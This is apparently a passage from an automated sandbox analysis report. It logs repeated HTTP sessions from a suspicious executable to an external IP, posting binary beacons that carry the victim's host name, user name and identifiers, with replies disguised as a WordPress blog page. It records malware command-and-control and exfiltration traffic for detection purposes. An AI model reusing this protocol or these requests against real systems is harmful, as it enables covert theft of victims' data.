                                            Apr 26, 2024 04:42:05.587946892 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:05.598576069 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:05.599412918 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:05.599534035 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:05.599654913 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:05.600627899 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:05.600692987 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:05.600725889 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.44973945.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:05.836232901 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:06.025144100 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:06.904539108 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:05 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:06.904690981 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:06.904705048 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:06.912899017 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:06.913083076 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:06.913249969 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:06.913366079 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:06.913522005 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:06.913640022 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:06.913676977 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.44974045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:07.242464066 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:07.429464102 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:08.444988012 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:07 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:08.445014000 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:08.445220947 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:08.471952915 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:08.472357035 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:08.472496033 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:08.472635984 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:08.473453045 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:08.473562956 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:08.473640919 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.44974145.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:08.768305063 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:08.957061052 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:09.833314896 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:08 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:09.833411932 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:09.833451986 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:09.841272116 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:09.841691017 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:09.841867924 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:09.841908932 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:09.842154026 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:09.842238903 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:09.842323065 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.44974245.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:10.160803080 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:10.350081921 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:11.220868111 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:10 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:11.220902920 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:11.221327066 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                            Data Ascii: UTF-8" />
                                            Apr 26, 2024 04:42:11.221472979 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:11.230864048 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:11.231679916 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:11.231879950 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:11.231937885 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:11.232424021 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:11.232522964 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.44974345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
